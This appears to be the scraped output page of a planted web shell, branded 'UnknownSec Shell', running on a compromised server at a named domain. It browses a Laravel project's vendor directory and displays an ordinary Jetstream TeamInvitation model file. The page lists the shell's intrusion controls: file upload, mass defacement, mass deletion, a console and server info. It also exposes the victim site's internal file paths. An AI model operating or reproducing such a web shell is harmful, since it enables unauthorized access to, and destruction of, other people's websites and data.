shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
laravel
/
jetstream
/
stubs
/
app
/
Models
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
TeamInvitation.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Relations\BelongsTo; use Laravel\Jetstream\Jetstream; use Laravel\Jetstream\TeamInvitation as JetstreamTeamInvitation; class TeamInvitation extends JetstreamTeamInvitation { /** * The attributes that are mass assignable. * * @var array<int, string> */ protected $fillable = [ 'email', 'role', ]; /** * Get the team that the invitation belongs to. */ public function team(): BelongsTo { return $this->belongsTo(Jetstream::teamModel()); } }
© 2026 UnknownSec